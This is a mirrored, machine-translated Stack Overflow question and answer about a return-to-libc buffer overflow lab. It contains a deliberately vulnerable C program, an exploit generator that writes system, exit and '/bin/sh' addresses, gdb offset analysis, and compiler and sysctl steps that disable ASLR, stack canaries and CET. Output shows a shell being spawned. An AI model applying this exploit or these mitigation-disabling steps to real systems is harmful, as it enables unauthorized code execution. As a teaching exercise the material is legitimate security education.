返回 libc 缓冲区溢出攻击
[英]Return to libc buffer overflow attack
问题描述
I tried to make a return to libc buffer overflow.
我试图返回 libc 缓冲区溢出。 I found all the addresses for system, exit and /bin/sh, I don't know why, but when I try to run the vulnerable program nothing happens.我找到了 system、exit 和 /bin/sh 的所有地址,我不知道为什么,但是当我尝试运行易受攻击的程序时没有任何反应。 system, exit address /bin/sh address系统,退出地址/bin/sh 地址
Vulnerable program:易受攻击的程序:
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#ifndef BUF_SIZE
#define BUF_SIZE 12
#endif
int bof(FILE* badfile)
{
char buffer[BUF_SIZE];
fread(buffer, sizeof(char), 300, badfile);
return 1;
}
int main(int argc, char** argv)
{
FILE* badfile;
char dummy[BUF_SIZE * 5];
badfile = fopen("badfile", "r");
bof(badfile);
printf("Return properly.\n");
fclose(badfile);
return 1;
}
Exploit program:利用程序:
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int main(int argc, char** argv)
{
char buf[40];
FILE* badfile;
badfile = fopen("./badfile", "w");
*(long *) &buf[24] = 0xbffffe1e; // /bin/sh
*(long *) &buf[20] = 0xb7e369d0; // exit
*(long *) &buf[16] = 0xb7e42da0; // system
fwrite(buf, sizeof(buf), 1, badfile);
fclose(badfile);
return 1;
}
And this is the program that I use to find MYSHELL address(for /bin/sh)这是我用来查找 MYSHELL 地址的程序(用于 /bin/sh)
#include <stdio.h>
void main()
{
char* shell = getenv("MYSHELL");
if(shell)
printf("%x\n", (unsigned int) shell);
}
Terminal: Terminal image after run retlib终端:运行 retlib 后的终端图像
1 个解决方案
解决方案1
2 已采纳 2021-05-17 02:56:00
First, there are a number of mitigations that might be deployed to prevent this attack.首先,可以部署许多缓解措施来防止这种攻击。 You need to disable each one:您需要禁用每个:
- ASLR : You have already disabled with
sudo sysctl -w kernel.randomize_va_space=0.ASLR :您已经使用sudo sysctl -w kernel.randomize_va_space=0禁用。 But a better option is to disable it only for one shell and its children:setarch $(uname -m) -R /bin/bash.但更好的选择是仅对一个 shell 及其子级禁用它: setarch $(uname -m) -R /bin/bash。 - Stack protector : The compiler can place stack canaries between the buffer and the return address on the stack, write a value into it before the buffer write operation is executed, and then just before returning, verify that it has not been changed by the buffer write operation.堆栈保护器:编译器可以在缓冲区和堆栈上的返回地址之间放置堆栈金丝雀,在执行缓冲区写入操作之前向其中写入一个值,然后在返回之前,验证它没有被缓冲区写入更改手术。 This can be disabled with
-fno-stack-protector.这可以使用-fno-stack-protector禁用。 - Shadow stack : Newer processors might have a shadow stack feature (Intel CET) that when calling a function, stashes a copy of the return address away from the writable memory, which is checked against the return address when returning from the current function. Shadow stack : Newer processors might have a shadow stack feature (Intel CET) that when calling a function, stashes a copy of the return address away from the writable memory, which is checked against the return address when returning from the current function. This (and some other CET protections) can disabled with
-fcf-protection=none.可以使用-fcf-protection=none禁用此(以及其他一些 CET 保护)。
The question does not mention it, but the addresses used in the code (along with use of long ) indicate that a 32-bit system is targeted.问题没有提到它,但代码中使用的地址(以及long的使用)表明目标是 32 位系统。 If the system used is 64-bit, -m32 needs to be added to the compiler flags:如果使用的系统是 64 位,则需要在编译器标志中添加-m32 :
gcc -fno-stack-protector -fcf-protection=none -m32 vulnerable.c
When determining the environment variable address from one binary and using it in another, it is really important that their environment variables and invocation from shell are identical (at least in length).当从一个二进制文件确定环境变量地址并在另一个二进制文件中使用它时,它们的环境变量和来自 shell 的调用是相同的(至少在长度上)是非常重要的。 If one is executed as a.out , the other should also be executed as a.out .如果一个作为a.out执行,另一个也应该作为a.out执行。 One being in a different path, having a different argv will move the environment variable.在不同的路径中,具有不同的argv将移动环境变量。
Alternatively, you can print the address of the environment variable from within the vulnerable binary.或者,您可以从易受攻击的二进制文件中打印环境变量的地址。
By looking at the disassembly of bof function, the distance between the buffer and the return address can be determined:通过查看bof function的反汇编,可以确定缓冲区与返回地址的距离:
(gdb) disassemble bof
Dump of assembler code for function bof:
0x565561dd <+0>: push %ebp
0x565561de <+1>: mov %esp,%ebp
0x565561e0 <+3>: push %ebx
0x565561e1 <+4>: sub $0x14,%esp
0x565561e4 <+7>: call 0x56556286 <__x86.get_pc_thunk.ax>
0x565561e9 <+12>: add $0x2de3,%eax
0x565561ee <+17>: pushl 0x8(%ebp)
0x565561f1 <+20>: push $0x12c
0x565561f6 <+25>: push $0x1
0x565561f8 <+27>: lea -0x14(%ebp),%edx
0x565561fb <+30>: push %edx
0x565561fc <+31>: mov %eax,%ebx
0x565561fe <+33>: call 0x56556050 <fread@plt>
0x56556203 <+38>: add $0x10,%esp
0x56556206 <+41>: mov $0x1,%eax
0x5655620b <+46>: mov -0x4(%ebp),%ebx
0x5655620e <+49>: leave
0x5655620f <+50>: ret
End of assembler dump.
Note that -0x14(%ebp) is used as the first parameter to fread , which is the buffer that will be overflowed.请注意, -0x14(%ebp)用作fread的第一个参数,这是将溢出的buffer 。 Also note that ebp was the value of esp just after pushing ebp in the first instruction.另请注意, ebp是在第一条指令中推入ebp之后esp的值。 So, ebp points to the saved ebp , which is followed by the return address.因此, ebp指向保存的ebp ,后面是返回地址。 That means from the start of the buffer, saved ebp is 20 bytes away, and return address is 24 bytes away.这意味着从缓冲区开始,保存的ebp距离为 20 个字节,返回地址距离为 24 个字节。
*(long *) &buf[32] = ...; // /bin/sh
*(long *) &buf[28] = ...; // exit
*(long *) &buf[24] = ...; // system
With these changes, the shell is executed by the vulnerable binary:通过这些更改,shell 由易受攻击的二进制文件执行:
$ ps
PID TTY TIME CMD
1664961 pts/1 00:00:00 bash
1706389 pts/1 00:00:00 bash
1709328 pts/1 00:00:00 ps
$ ./a.out
$ ps
PID TTY TIME CMD
1664961 pts/1 00:00:00 bash
1706389 pts/1 00:00:00 bash
1709329 pts/1 00:00:00 a.out
1709330 pts/1 00:00:00 sh
1709331 pts/1 00:00:00 sh
1709332 pts/1 00:00:00 ps
$
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.